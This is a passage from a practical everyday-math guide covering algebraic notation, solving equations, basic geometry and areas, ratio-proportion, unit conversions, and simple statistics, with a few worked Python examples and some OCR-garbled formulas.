is to place them inside parentheses. For example, here’s an 
expression with four variables, grouped by two sets of parentheses: 


(a+b)+(c+d) 


The value in grouping the items (also called terms) is that such 
groupings often make an expression easier to read and a problem 
easier to solve. And to increase flexibility, sometimes ungrouping 
items is useful. 


Getting a handle on equations 


An equation is similar to an expression in that they both are 
combinations of terms. The difference between an equation and 
an expression is that the equation has an equals sign (=). In an 
equation, the expression on the left side of the equals sign is equal 
to the expression on the right side. 


For example, consider these two expressions: 


3+4+7 
5+8+1 


These two expressions aren’t much to write home about, but when 
you relate the expressions in an equation, things get slightly more 
exciting. For example, is the following equation true? 


3+4+7=5+8+1 


A little arithmetic on both sides of the equation gives you this: 


14=14 


What a relief! They are equal. Now in the world of algebra, equations 
containing variables are far more interesting. For example: 


a+b=14 


You don’t know what a and b are yet, but the equation declares 
that their sum is 14. 


The equality relationship in an equation applies to all algebra, from 
the most trivial to the most sophisticated. Equations such as this 
come up a lot in simple word problems. 


Operating with variables 


You can do the same operations with variables that you do with 
numbers. You can add, subtract, multiply, and divide variables. 
You can also raise them to a power (called exponentiation) or find 
their square roots. You write variables just like numbers. (If you 
want a fancy name for this, the rules are called mathematical 
notation.) Here’s what you need to know: 


When you add and subtract variables: You use the same 
notation you use to add and subtract numbers: 
a+b 
a-b 
a+0 
a-0 

When you multiply variables: You use special notation. You 
don’t use the traditional times sign (×) because it looks too 
much like the variable x. Instead, you use parentheses, a dot 
(·), or no sign. For example, all of the following are ways to 
show that you’re multiplying 2 and b. 
2·b 
2(b) 
2b 


When you divide variables: You should never use the traditional 
division sign (÷). Instead, you express division as a fraction: 


|s Aly NIC 


When you write powers and square roots of variables: You 
write powers and square roots exactly the same way you’d 
write numbers: 


f² 
√g 


The following equation looks a little complicated, but it’s composed 
entirely of simple variables and a constant. The equation just 
follows the rules of notation. 


_(h)ar? 
za S 


The previous equation actually does something practical. In one 
algebraic “sentence,” it shows how to calculate the volume of a 
concrete patio in square feet, divide to get cubic yards, and multiply 
by the cost per yard. The result is z, the cost of the concrete for 
the patio. (In pouring ready-mix concrete, yard is the term suppliers 
use for a cubic yard.) 


You can do the same operations with variables that you do with 
numbers, and you need to follow the same rules of arithmetic for 
variables that you follow for numbers. See Chapter 1 for details on 
operations and the rules that apply to them. 


Applying the same operation on 
both sides of the equal sign 


When math in real life gives you a mash-up of facts, you can 
usually make a good equation. But a good equation is just the 
starting point. You need to solve it, too. 


To solve an algebra problem, you must perform the same math 
operations on both sides of the equation. If you do so, the equation 
maintains its equality. That’s essential for problem solving, and it 
works every time. 


For example, here’s an equation that tells you one thing: 
a-7=b+9 


Add 7 to both sides. Because you’re doing the same thing to both 
sides of the equation, you preserve the equality. 


a-7+7=b+9+7 
a=b+16 


Now subtract b from both sides. 


a=b+16 
a-b=b+16-b 
a-b=16 


At this point, you have “cleaned up” the equation. 


An essential tactic in solving many algebra problems is to get all 
variables on one side of the equation. In some cases, you want to 
get one variable on one side of the equation. Both techniques are 
valuable. 


In the subtraction example, you don’t know the final answer — 
yet — but you can see that a - b = 16. In the addition example, 
you are expressing the value of a in terms of a variable (b) and a 
constant (16). 


This same technique works for other operations, too. In this next 
equation, you multiply both sides of an equation by 2. This isn’t the 
simplest way to the solution, but it shows how performing the same 
operation on both sides of an equation preserves the equality: 


a+3=9 
2(a+3)=2(9) 
2(a+3)=18 


Now to solve this equation, you can get rid of the parentheses on 
the left by multiplying each term in the parentheses by 2. 
2(a+3)=18 
2a+6=18 


To clean the equation up a bit more, subtract 6 from each side. 


2a+6=18 
2a+6-6=18-6 
2a=12 


You can wrap things up by dividing each side of the equation by 2. 
2a=12 
2a/2=12/2 
a=6 


The answer is a = 6. Notice that through all the different steps, 
you preserve the equality by doing on one side of the equal sign 
whatever you did on the other side. 


Keeping order with operations 


When equations get complex, you solve them by doing operations 
in the correct order to simplify them. Not surprisingly, this correct 
order is called the order of operations (and sometimes it’s known 
as operator precedence). Here’s the order in which you perform the 
different operations in an equation, arranged from first to last: 


Terms inside parentheses or brackets 

Exponents and roots 

Multiplication and division 

Addition and subtraction 


The rule of thumb is to work from the “inside out” (starting with 
terms inside parentheses) and make complex expressions (exponents 
and roots) simple. 


For example, simplify 


x = (5-3) + (22 + 6a) - (4a · 3) 


to become 


x=2+22+6a-12a 


Three-for-one equation bonus: Calculating 
speed, time, and distance 


If you drive a car or have ever flown in an airplane, you've probably noticed that 
time, speed, and distance are related. Here’s the basic formula for distance, based 
on speed and time: 


distance = velocity × time 
d = vt 


Distance equals speed multiplied by time. In science, the correct term for speed is 
velocity, represented by v. But wait! As they say on TV, there’s more! The following 
related formulas are also true: 


velocity = distance / time 
v = d / t 

time = distance / velocity 
t = d / v 

When you know two of the parts of the formula, you can solve for the third part. If, 
for example, you know the distance you've traveled and the time it has taken, you 
can calculate your average velocity. If you know the distance you've traveled and 
the average velocity, you can calculate the time you've been driving. 


This is a great three-for-one bonus formula, and you'll find other examples in 
day-to-day math. For details, head to Chapter 10. 


Fortunately, a good equation keeps things separate, with parentheses 
and math signs. Be careful, though, because a bad equation can 
be ambiguous. Don’t blame yourself — unless you made up the 
equation. 


Jousting with Geometry: Simple 
Rules about Shape and Size 


The term geometry comes from the Greek words meaning “earth 
measurement” (even though some contend that it actually translates 
as “causes students pain and suffering”). But for the purposes of 
math you’re most likely to use in real life, you can safely reduce 
the scope of geometry from measuring the earth to measuring for 
a pool, deck, or patio, or for laying out a playing field for soccer, 
badminton, or volleyball. 


Geometry goes back a long way, at least to ancient Egypt and 
Babylonia. It makes sense that when the ruler wanted tax money 
from farmers, the process began by measuring the farmers’ fields. 
That’s where geometry comes in. Euclid, the Greek mathematician, 
gets the credit for giving us formal geometry. He developed principles 
in about 300 BCE, and so Euclidean geometry is the kind of geometry 
you learned in school. It’s very abstract and is based on axioms 
and proofs. Euclidean geometry is fascinating stuff, but it’s not 
very practical for day-to-day problems. 


Looking at geometry’s basic parts: 
Planes, points, and lines 


The geometry used in everyday life is plane geometry and solid 
geometry. Plane geometry is a world of points, lines, and shapes — 
all of which take place on a plane. Solid geometry is a world of 
volumes. 


Plain talk about the plane 


A plane is a flat, two-dimensional surface. Being theoretical, a 
geometric plane is perfectly flat and extends forever in all directions. 
In real life, you draw geometric figures on a flat piece of paper or 
a flat computer screen. If you’re lucky, your lawn is fairly flat, and 
your street is, too. 


To make geometry work, there must be a coordinate system, which 
is a way of describing the position of any object on a plane. 


The most famous and commonly used coordinate system is the 
Cartesian coordinate system (named after René Descartes, the 
famous French mathematician and philosopher). Figure 2-1 shows 
the Cartesian coordinate system. 


Figure 2-1: The Cartesian coordinate system. 


The system has two axes (plural for axis). The horizontal axis is 
the x-axis, and the vertical axis is the y-axis. Along each axis are 
points, and the two axes cross each other at point (0,0), called the 
origin. As a bonus, you get four quadrants, named I, II, III, and IV. 


You can describe any position on the plane by naming coordinates. 
In Figure 2-1, the point shown is at coordinate (5,4). Its location is 
5 to the right of the origin and 4 up from the origin. The pair of 
numbers describing a point’s position on the plane is called an 
ordered pair. 


Getting to the point 


The point is the basic building block of geometry. In theory, it has 
no height or width. In real life, it’s about the size of a pencil point 
or the little hole that a pin makes. 


Each point represents a place on the plane. It’s a precise location. 
If the GPS map on your smartphone is a plane, then the blue dot 
(that’s what I’ve got on my phone) is the point where you are. 


In fact, all reading and following of maps amounts to plotting points 
(your locations) on a plane. With the smartphone or a GPS, the 
application does it for you. With a paper map, you do it manually. 


Falling in line 

If the point is the basic building block of geometry, then the line is 
the next step. It should be called “Son of Point, the Sequel.” A line 
is straight, theoretically has length but no width, and continues on 
in either direction without stopping. 


Walking in a city with a grid layout 


Many cities are laid out in a grid pattern. They often have numbered streets (10th 
Street, 11th Street, and so on) going in one direction, and lettered streets (A Street, 
B Street, and so on) going in the other. Some have numbered avenues instead. 


Say you're in a city with a grid, and you want to get from Point A to Point B. You 
find out that Point B is three blocks east and two blocks north. Here are a couple 
of ways to get there: 


Think of point A as (0,0). Go east three blocks. You are now at (3,0). Go north two 
blocks. You have now arrived at Point B (3,2). 


Alternatively, you could go north two blocks, arriving at (0,2). Then you go east 
three blocks, putting you at (3,2). The route is different, but the result is the 
same. 


This technique is common in cities with a grid, and knowing it is handy if you need 
to ask for directions. “Yeah, just go east three blocks and north two blocks. You 
can’t miss it.” Well, if directions such as north, south, east, and west give you 
trouble, make sure the direction-giver points which way to go. 


A straight line is the shortest distance between two points, which 
brings us to the discussion of line segments. Line segments are 
lines that have a beginning and ending point. To be formal, a line 
segment can be represented by its two end points. Figure 2-2 
shows a line with end points (0,0) and (5,0). 


Figure 2-2: A line segment. 


The line is common in life. It has hundreds of uses and has populated 
our vocabulary. Think “walk the line,” “draw the line,” and “that’s a 
line if I ever heard one.” 


If you like to spend your evenings working out first-degree 
polynomial functions of one variable, you'll see a lot of lines. But if 
that’s not useful or fun, you also use lines in laying out fencing for 
your house or for drying clothes on a clothesline. They’re the same 
thing. 


Thanks to the line and the point, you can do some excellent things 
with angles, shapes, areas, and volumes. 


What’s your angle? Acute, obtuse, 
right angles, and more 


Geometry includes a lot of angles, and you should know them. An 
angle is a geometric figure made up of two lines, joined at an end 
point called the vertex. In an angle, the lines go on forever and are 
known as rays. 


Angles come in just a few flavors, based on how wide or narrow 
they are. Angles are measured in degrees. The smallest angle is 
theoretically 0 degrees, but that’s very boring. The largest angle is 
360 degrees, which is a full sweep. That’s what 12:00 PM looks like 
on a clock. Figure 2-3 shows various types of angles. 


Figure 2-3: Types of angles (acute, right, obtuse, straight, reflex, and full rotation). 


Here are angle basics: 


Acute: This angle is less than 90 degrees. 


Right: This angle is exactly 90 degrees. 


Obtuse: This angle is greater than 90 degrees but less than 
180 degrees. 


Straight: This angle is 180 degrees and doesn’t look much like 
an angle. 


Reflex: This angle is greater than 180 degrees but less than 
360 degrees. 


Full rotation: This angle is 360 degrees and doesn’t look much 
like an angle. 


You should know your angles in order to communicate with 
others. In some cases, you actually use angles. 


If you’re involved with crafts or woodworking, you probably 
need to cut things at angles. 


If you go to the picture framing shop, you can ask the 
salesperson what angle the bevel-cut matte will be. 


When you talk to the carpet layer, you can describe an odd- 
shaped room’s angles. 


If you help your kids with math, you’ll look smart and save 
yourself embarrassment. 


The shape of things 


The world is filled with fascinating shapes, both beautiful and 
practical. Although many shapes exist, life is short, so this section 
describes only three of them — rectangles, triangles, and circles, 
which just happen to be the ones you'll use most often in your 
real-life math problems. 


Rectangles and squares 

A rectangle is a four-sided figure. It has a length and a width, and 
each corner is a right angle. A square is a special rectangle. The 
length and width are the same. Figure 2-4 shows a square and a 
rectangle. 


Figure 2-4: A square and a rectangle. 


Triangles 


A triangle is a three-sided figure. Triangles come in several flavors, 
and each one has its own name. 


Figure 2-5 shows different types of triangles. Here are triangle 
basics: 


Acute triangle: The angles of an acute triangle are all less 
than 90 degrees. 


Right triangle: A right triangle has one angle of exactly 
90 degrees. 


Obtuse triangle: An obtuse triangle has one angle greater 
than 90 degrees. 


Isosceles triangle: An isosceles triangle has two sides of equal 
length and, therefore, two angles with the same value. 


Equilateral triangle: All three sides of an equilateral triangle 
are equal in length; therefore, the three angles have the same 
value. 


Scalene triangle: A scalene triangle has sides of three different 
lengths and therefore three different angles. 


Figure 2-5: A variety of triangles. 


Round and ‘round you go: Circles 


A circle is a shape in which every point on the edge is the same 
distance from the center. That distance is the radius. Figure 2-6 shows 
the parts of a circle. 


Figure 2-6: Parts of a circle. 


Here’s what you need to know about circles: 


Radius: The radius is the distance from the center to the 
edge, known in formulas as r. 


Diameter: The diameter is the distance across the circle, 
through the center. The diameter (also called d) is equal to 
2 times the radius, or 2r. 


Circumference: The circumference is the distance around a 
circle, known in formulas as c. 


Calculating areas 


An area is a quantity of two-dimensional space. You need to know 
about three areas: areas of the rectangle, triangle, and circle. 
Fortunately, the area formulas you’re likely to use are both easy to 
understand and easy to use. By the way, it doesn’t matter whether 
you're talking about square inches or square miles; the formulas 
are the same. 


Finding the area of squares and rectangles 


The formula for calculating the area of a rectangle is very simple: 
You simply multiply the rectangle’s length by its width. Figure 2-7 
shows a rectangle’s length and width. 


Figure 2-7: The length and width of a rectangle. 


The official formula looks like this: 


area = length × width 
a=lw 


Finding the area of triangles 


The area of a triangle is also easy to calculate. Every triangle has a 
base and a height. Figure 2-8 shows a triangle’s base and height. 


Figure 2-8: A triangle’s base and height. 


The formula for calculating the area of a triangle is also very 
simple. Just multiply the base by the height and divide by 2: 


area = (base × height) / 2 


Finding the area of circles 


The area of a circle is easy, too. Use the radius of the circle, shown 
in Figure 2-9, and the “magic” number pi (π), which is approximately 
3.14159. 


Illustration by Wiley, Composition Services Graphics 


Figure 2-9: A circle’s radius. 


To find the area of a circle, use this simple formula, in which you 
multiply π by the radius squared: 


a = πr² 


Getting pushed to the 
edge: Perimeters 


The distance around a geometric figure, such as a square, rectangle, 
or triangle, is called the perimeter. The word comes from the 
Greek peri (around) and meter (measure). In the case of a circle, 
the perimeter gets a special name — circumference. Figure 2-10 
shows the perimeter of a rectangle. 


Knowing a perimeter is handy (and some say essential) for measuring 
fencing, a paddock, a circular exercise ring, or bender boards 
for flower beds. 


Figure 2-10: The perimeter of a rectangle. 


You can find a rectangle’s perimeter, using one of the following 
methods: 


Measure each side and add the numbers up. 


Double the length and double the width and add them 
together. The formula is 


p=2l+2w 


In the special case of a square, where all four sides are equal, 
just multiply the length of one side by 4. 


To find the perimeter of a circle, use the famous (but common) 
circumference formula, in which you multiply π by the circle’s 
diameter: 


c = πd 


Speaking volumes about boxes 


Volume is a quantity of three-dimensional space. That space has 
length, width, and height. The official name for a box-shaped item 
is cuboid. The unofficial name is box. Figure 2-11 shows a cuboid. 


Think of volume as a measure of “how much of something” you 
are buying or using. While some items are measured by length or 
weight, volume is the standard measure for almost all liquids. 


Figure 2-11: A cuboid, or (in plain English) box. 


A math secret 


The liter and the milliliter are very important, even in the non-metric United States. 
Medicine and science rely on these units. The nurse or scientist usually dispenses 
liquids, and the liter and milliliter are actually measures of cubic volume, based on 
length, width, and height. One liter (1 L) is the volume of a cube with dimensions 
of 10 centimeters (10 cm) on each side. One milliliter (1 mL) is one-thousandth of 
a liter, which is the volume of a cube with dimensions of one centimeter (1 cm) on 
each side. 


The common units of volume are cubic inches or cubic centimeters 
(which you’d want to know to determine engine displacement), 
cubic feet or liters (good for comparing refrigerator 
capacities), and cubic yards or cubic meters (the units that specify 
how much ready-mix concrete you need). 


In addition, we buy many items around us by liquid measure (a 
1-gallon jug, for example). The gas tank in your car is described 
by its capacity in gallons or liters. Even the storage lugs in your 
garage have capacities labeled in gallons or liters. Firewood is sold 
by the cord (which, interestingly, is defined by law in most states 
of the U.S. and typically refers to a stack of wood 4 feet wide, 4 feet 
high, and 8 feet long — 128 cubic feet). 


As part of your brief education or review of geometry, you should 
be able to calculate the volume of a cuboid. The formula is very 
simple: 


volume = length x width x height 
v=lwh 


To see a real-life example of a cuboid, go to one of the popular 
rent-a-truck moving companies. Ask for a book box. Its dimensions 
are 12 inches x 12 inches x 12 inches. Because 12 inches are in a 
foot, that’s 1 foot x 1 foot x 1 foot, giving a volume of 1.0 cubic foot 
(because 1 x 1 x 1 = 1). 


Summing up geometry 


If you read the preceding sections from beginning to end, you may 
have noticed that I arranged the info to go from points to lines to 
flat shapes (rectangles, squares, triangles, and circles) to cuboids. 
Those items fit in dimensional space (as the mathematicians say) in 
an orderly way. 


Table 2-1 summarizes the common geometric shapes out in the 
world, showing the name, the dimension they “live in,” and what 
you measure or calculate. 


Table 2-1 Geometric Shapes 

Name                                   Dimension   Measurement 
Point                                  0           Position 
Line                                   1           Length 
Rectangle, square, triangle, circle    2           Area 
Cuboid                                 3           Volume 




Chapter 3 


Becoming a Believer: 
Conversion, Statistics, 
Probability, and More 


In This Chapter 


Using the ratio-proportion formula 
Understanding conversions 

Interpreting basic statistics 

Knowing your chances through probability 


The math problems in real life take many forms. Although these 
problems can be a challenge, their solutions take only a few 
forms. Basic arithmetic (the topic of Chapter 1) handles a lot, from 
figuring mortgage interest to calculating cantaloupes. And basic 
algebra (which you can read about in Chapter 2) takes care of 
most of the rest. 


Then the basics evolve into specialties like statistics, conversions, 
and probability. Fortunately, the real-life math you’ll encounter 
in these areas involves math you already know how to do. For 
example, two common statistics are based on addition, division, 
and counting, and unit conversions are based on multiplication 
and division. 


The same is true of probability. The math for basic calculations is 
simple. You need only to know some terms and how to apply them. 


In this chapter, I explain the basic principles of conversion, statistics, 
and probability, and show you the greatest formula ever, 
which is almost a universal problem solver. As a bonus, I give you 
a brief rundown of the best tools to use to handle real-life math. 


Wrangling Ratio-Proportion: 
The Best Calculation Method 


If 1 (of something) gets you 2 (of something else), then 2 gets you 
4. That, in a nutshell, is the entire concept of ratio-proportion. 


To understand, you first need to know what a ratio is. A ratio is the 
relationship between two quantities. Some ratios are obvious. For 
example, if 8 slices are in 1 pie, the ratio is 8 slices per pie and it’s 
presented mathematically like this: 


a/b 


Ratio-proportion is simply a calculation method that compares two 
ratios. The two ratios amount to four items. If you know three of 
them, you can solve for the fourth. 


A proportion is the relationship between four quantities, shown in 
the following equation. You say this equation as “a is to b as c is to 
d.” The first item divided by the second is equal to the third item 
divided by the fourth. 


a/b = c/d 


A proportion doesn’t change. For example, if 1 cup of flour produces 
8 pancakes, the proportion is the same whether you’re using 
100 or 1,000 cups of flour. 


A ratio-proportion equation has a ratio on the left that’s equal to 
another ratio on the right. Going back to the 8 slices in a pie example, 
a ratio-proportion question might ask how many slices are in 2 
pies. This one’s easy (as pie). There are 16 slices in 2 pies. Here’s 
the structure for solving a ratio-proportion problem, using the pie 
example: 


known equivalent / known equivalent = known equivalent / desired equivalent 


1 pie / 8 slices = 2 pies / x slices 
x = 2 x 8 
x = 16 


The math amounts to multiplying a (1 pie) by d (x slices) and b 
(8 slices) by c (2 pies), in a maneuver called cross-multiplying. 


You can also flip both sides upside down, but you still have to 
cross-multiply: 


known equivalent / known equivalent = desired equivalent / known equivalent 


8 slices / 1 pie = x slices / 2 pies 
2 x 8 = x 
16 = x 


Try out ratio-proportion. Say you have 2 bags of apples with 6 
apples in each bag. Your crazy uncle just gave you 81 bags. How 
many apples did he give you? 


1. Set up the problem. 

known quantity / known quantity = known quantity / desired quantity 

2 bags / 12 apples = 81 bags / total number of apples 


2. Cross multiply to solve. 

2/12 = 81/x 
2x = 12 x 81 
2x = 972 
x = 486 


The answer is 486 apples. 


Doing Conversions: Lots of 
Pleasure and Hardly Any Pain 


The world is the product of thousands of years of civilization. 
That’s good. But those millennia have produced many different 
systems of measurement. That’s bad. 


The situation is worse when you need to convert quantities (like 
distance, weight, and volume) from one measurement system to 
another. It’s especially difficult in the United States, because the 
main system in the U.S. is American units, while the rest of the 
world uses the metric system. 


No problem! With a little understanding and the right tools, you 
will be a conversion whiz. Understanding takes a little effort, and 
the tools are free. 


Factoring in the conversion factor 


A conversion factor is a simple formula that lets you convert from 
one unit to another. Conversion factors are fast, fun, friendly, and 
common in everyday life. You probably know a bunch of them 
already. For example, here are a couple of conversion factors: 
Twenty-four hours are in a day, and 12 inches are in a foot. 


For conversion factors you don’t know, here’s a simple math 
secret: To convert from one unit to another, you either multiply or 
divide. You just need to know what value to multiply or divide by. 


A simple example is converting feet to yards. Say you want to know 
how many yards are in 81 feet. You know a yard has 3 feet. So you 
divide 81 feet by 3 to get yards. Here’s the equation: 


Yards = feet / 3 
Yards = 81 / 3 
Yards = 27 


To find any conversion factor you don’t already know, go to 
http://www.google.com and enter the conversion you want. 
For example, enter “feet to miles,” “tons to pounds,” and so forth. 
Almost everything produces an immediate display on the “pre-search,” 
and you only have to click on that. 


Using United States customary units 


United States customary units (the “American system”) are measurements 
used in the United States. The basic units are 

Length: inch, foot, yard, mile 
Area: acre, square foot 
Volume: cubic inch, cubic foot, cubic yard 
Liquid volume: fluid ounce, pint, quart, gallon, teaspoon, tablespoon, cup 
Weight (mass): ounce, pound, ton 


The easiest way to convert between units of the American system 
or from American to metric is to use an Internet calculator. 


You can display the conversion factor online with no effort. Go to 
http://www.google.com and enter the conversion you want. 


The preceding section has more details on using online conversion 
calculators. (If you’re working in the kitchen — where most real-life 
conversion conundrums occur — head to Chapter 6 for a handy-dandy 
conversion chart.) 


Managing the metric system 


The metric system is officially called the International System of 
Units. Most of the world, except for three countries (the United 
States, Liberia, and Burma/Myanmar), uses the metric system. The 
basic units in the metric system are 

Length: meter, kilometer 
Area: hectare 
Volume: liter 
Weight (mass): kilogram, tonne 


Metric units are easy, because every unit is a multiple of ten of 
another unit. The easiest way to convert between metric units or 
from metric to American units is to use an Internet calculator. You 
can also display conversion factors online with no effort. See the 
earlier section, “Factoring in the conversion factor,” for details. 


If you work in medicine or science, you’re practically home free, 
because you work with metric units all the time. 


Temperature is expressed in degrees Fahrenheit in the United 
States and in degrees Celsius in the rest of the world. To convert 
from Fahrenheit to Celsius, use this formula: 

°C = (°F - 32) x 5/9 


To convert from Celsius to Fahrenheit, use this formula: 


°F = °C x 9/5 + 32 


Mastering Simple Statistics 


Statistics is the study of data. A person collects data, organizes 
it, draws inferences from it, and presents it (usually in tables or 
charts). You can be sure that businesses, scientists, government 
agencies, medical researchers, and economists create and use 
statistics a lot. And there’s a specialty: A professional number 
cruncher is a statistician. 


Statistical information (stats) can be your friend. The world’s filled 
with uncertainty, but statistics help you make decisions in the face 
of uncertainty. 


For example, many people want to see how home prices or home 
mortgage interest rates are trending. The trend might give you an 
indication of when to buy if you want to save big money. Similarly, 
watching how your salary increases are trending can help you draw 
some conclusions. If it’s trending at about 1 percent per year (not 
good!), you know you probably aren’t going to see a big difference 
next year or the year after. In the following sections, I tell you what you 
need to know about statistics to make educated assessments of data. 


Don’t use statistics blindly. The old joke is “Did you hear about the 
statistician who drowned in a river with an average depth of 3 feet?” 


An average is a mean thing 


An average (also known as an arithmetic mean) is the result of 
adding up numbers in a collection and dividing by the number of 
items in the collection. Here’s the equation: 


Average = sum of items / number of items 


The nice thing about averages in real life is that you see a lot of 
them. Two common averages are average bowling score and grade 
point average (GPA). Of course, you can average just about anything, 
if the results will be meaningful to you. For example, you 
might average several weeks of grocery purchases to get a broad 
view of what you’re spending (an exercise that’s great when you’re 
trying to predict spending when you create a budget, as I explain 
in Chapter 10). To get your weekly average grocery bill, you would 
follow these steps: 


1. Add the total purchases. 

Total = $45.00 + $50.00 + $45.00 + $125.00 + $20.00 
Total = $285.00 


2. Divide by the number of times you bought groceries. 

Average = $285.00 / 5 
Average = $57.00 


One week you spent $125.00 (maybe you had a big family dinner). 
The next week you spent far less (maybe you were eating leftovers), 
and the other amounts are all pretty similar (between $45 
and $50). But taken all together, the average is $57.00. 


Mediating the median 


The median is the number that separates the upper half of a sample 
from the lower half. A median is not the same as an average. You 
simply arrange the values in order from lowest to highest and find the 
number in the middle of the list. That’s your median value. If the list 
has an even number of items, you average the two middle numbers. 


You can easily find some medians. Say you want to find the median 
prices of the eight homes that recently sold in your neighborhood. 
Follow these steps: 


1. Record the prices of the recent sales. 
Say the houses sold for these amounts: 


$196,000; $175,000; $190,000; $199,000; $220,000; 
$193,000; $187,000; and $195,000 


2. Arrange the values in order from lowest to highest. 


$175,000; $187,000; $190,000; $193,000; $195,000; 
$196,000; $199,000; $220,000 


3. Count halfway through the items. 


The number in the middle is the median. If the list has 
an even number of items (as it does here), average the 
two middle members, which in this case are $193,000 
and $195,000. The median price of the recently sold homes 
is $194,000. 


Statisticians like medians, because unlike averages, medians usually 
don’t get distorted by outliers. Averages can be misleading if you 
don’t know what to look for. For example, the median 2010 price of 
a home in the United States was $221,800, but the average price was 
$272,900. Here, the average price is higher than the median price, 
and the likely cause is that a small number of very expensive homes 
raised it. Remember, you interpret the median to mean that half the 
homes had prices of less than $221,800, and half had greater prices. 


Medians work best with large samples and a fairly even distribution 
of values. 


Figuring percentiles 


A percentile is a number between 0 and 100. It’s a value below 
which a certain percent of scores fall. For example, if you score at 
the 70th percentile of a test, your score is greater than 70 percent 
of other people taking the test. If you score at the 50th percentile, 
that’s right in the middle. 


The 25th percentile is also called the first quartile (Q1), the 
50th percentile is the second quartile (Q2), and the 75th percentile 
is the third quartile (Q3). 


You can calculate test percentiles yourself, provided you know the 
number of people taking the test and their scores. Say 30 people 
take a test. You scored 89 out of 100 points. You see that 24 of the 
30 test takers (which is 80 percent of them) scored below 89. Your 
score is greater than 80 percent of the other people, putting you in 
the 80th percentile. 


You tend to read percentiles more than calculate them. If you 
visit the U.S. Bureau of Labor Statistics and check any career (your 
current one or maybe one you’d like to get into), you’ll see some 
salary percentiles. 
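

The three statistics from the preceding sections, worked on the book's own figures, as an added example that is not part of the original text. The list TEST_SCORES is constructed to match the description (30 test takers, 24 of them below 89), and outlier_pull is a hypothetical helper that shows why the median resists outliers while the average does not.

```python
# Figures taken from the text above.
GROCERY_BILLS = [45.00, 50.00, 45.00, 125.00, 20.00]
HOME_PRICES = [196_000, 175_000, 190_000, 199_000,
               220_000, 193_000, 187_000, 195_000]

# Constructed sample: 24 scores below 89, your 89, and 5 scores above it.
TEST_SCORES = list(range(60, 84)) + [89] + [90, 92, 95, 97, 100]


def average(values):
    """Arithmetic mean: sum of items divided by number of items."""
    if not values:
        raise ValueError("cannot average an empty list")
    return sum(values) / len(values)


def median_by_hand(values):
    """Sort, then take the middle item, or average the two middle
    items when the list has an even number of items."""
    if not values:
        raise ValueError("cannot take the median of an empty list")
    ordered = sorted(values)
    mid = len(ordered) // 2
    if len(ordered) % 2 == 1:
        return ordered[mid]
    return (ordered[mid - 1] + ordered[mid]) / 2


def percentile_rank(scores, your_score):
    """Percent of all test takers who scored strictly below your_score."""
    below = sum(1 for s in scores if s < your_score)
    return 100 * below / len(scores)


def outlier_pull(values):
    """Drop the largest value and report how far the average and the
    median each move: (average shift, median shift)."""
    trimmed = sorted(values)[:-1]
    return (average(values) - average(trimmed),
            median_by_hand(values) - median_by_hand(trimmed))


if __name__ == "__main__":
    print("average grocery bill:", average(GROCERY_BILLS))
    print("median grocery bill: ", median_by_hand(GROCERY_BILLS))
    print("median home price:   ", median_by_hand(HOME_PRICES))
    print("percentile for 89:   ", percentile_rank(TEST_SCORES, 89))
    print("pull of the $125 week (average, median):",
          outlier_pull(GROCERY_BILLS))
```

The single $125.00 week moves the average by $17.00 and leaves the median untouched.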


Being aware of statistical fallacies 


Beware of misleading statistics, which can occur in business, 
government, and politics. Benjamin Disraeli, the great British 
prime minister, is supposed to have said, “There are three kinds 
of lies: lies, damned lies, and statistics.” Often, the problem is a 
false implication that’s accidental. But sometimes statistics seem 
designed to be misleading. Keep your analytical thinking cap on! 


Are you SATisfied? 


On some tests, such as the SAT, the raw score is the number of points gained from 
correct answers less the number of points lost from incorrect answers. 


The SAT has three parts, each with a score value of 200 to 800 points, and a 
maximum score of 2,400 points. In 2011, the average score in the United States was 
1500: 489 for writing, 514 for math, and 497 for critical reading. 


Bluntly, these average scores probably won't get you admitted to a first-class 
college. You need to score at the 90th percentile or above. To score at the 
impressive 98th percentile, try for a score of 2250: 750 for writing, 760 for math, and 
750 for critical reading. 


But don't despair if your SAT score isn't quite what you want it to be. In the 
admission process, colleges also consider GPA, extracurricular activities, and 
other factors. 


Bogus statistics can produce major problems in decision-making 
and could possibly cause disastrous consequences. Distortions 
come in many forms. Here are four: 


Misuse of rate-of-change data: Rate of change isn’t change. 
Rate of change can make it appear that some declines (such 
as unemployment) and some increases (such as salary) are 
big when they aren’t. If your salary went up 1 percent last 
year and 2 percent this year, for example, that’s change — a 
change of 1 percent and 2 percent. The distortion comes if 
your boss says “Your salary increase doubled, compared 
to last year.” Yes, 2 percent is double 1 percent and is 
mathematically correct, but that’s not a big deal. 


Distorted visual representations: Charts can contain 
distortions. For example, Figure 3-1 shows a proposed 
4.6 point increase in the highest income tax rate (from 
35 percent to 39.6) in a way that makes the change appear to 
be much larger than it is. If the chart showed the entire length 
of the bars (from 0 to 35 and 0 to 39.5), the visual would show 
that the increase isn’t dramatic. Instead, the chart seems to 
show that the second bar is 6 times the height of the first bar. 
Such distortions are sometimes accidental but are frequently 
deliberate. 


Cherry-picking and using meaningless stats: Beware of 
stats that either don’t answer the question asked or that 
try to put a good spin on bad news. For example, imagine a 
school claiming a graduation rate of over 90 percent. Sounds 
great, right? Now imagine that the school, in doing its 
calculations, didn’t count a large number of students who had 
dropped out. 


Distortions in your mind: Most statistics apply to large 
groups. They don’t apply to individual cases, so don’t let 
your mind create a distortion. For example, if you read that 
10 percent of people in a certain group will die of cancer, don’t 
count out ten friends and convince them that one of your 
group is at death’s door. 


Figure 3-1: Distorted visual representation. [Bar chart: bars labeled 35% and 39.6% on a vertical axis running from 34 to 42.] 


Always feel free to question statistics. Granted, you don’t have 
time to prove them all, but stay alert. 
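

The first two distortions in the list above can be put into numbers, as an added example that is not part of the original text. The axis starting point of 34 is an assumption read from the lowest axis label of Figure 3-1, and the function names are hypothetical.

```python
def apparent_ratio(first, second, axis_start):
    """Ratio of the drawn bar heights when the value axis begins at
    axis_start instead of 0."""
    if axis_start >= min(first, second):
        raise ValueError("the axis must start below both values")
    return (second - axis_start) / (first - axis_start)


def distortion(first, second, axis_start):
    """Compare what the eye sees with what the numbers say."""
    drawn = apparent_ratio(first, second, axis_start)
    actual = second / first
    return {
        "drawn_ratio": round(drawn, 2),      # bar 2 height / bar 1 height
        "actual_ratio": round(actual, 2),    # value 2 / value 1
        "exaggeration": round(drawn / actual, 2),
    }


def change_summary(old_rate, new_rate):
    """Express one change two ways: in percentage points (the change
    itself) and as a relative change (the 'rate of change')."""
    if old_rate == 0:
        raise ValueError("relative change from 0 is undefined")
    points = new_rate - old_rate
    return {
        "points": round(points, 2),
        "relative_percent": round(100 * points / old_rate, 1),
    }


if __name__ == "__main__":
    # Tax-rate chart from Figure 3-1, axis assumed to start at 34.
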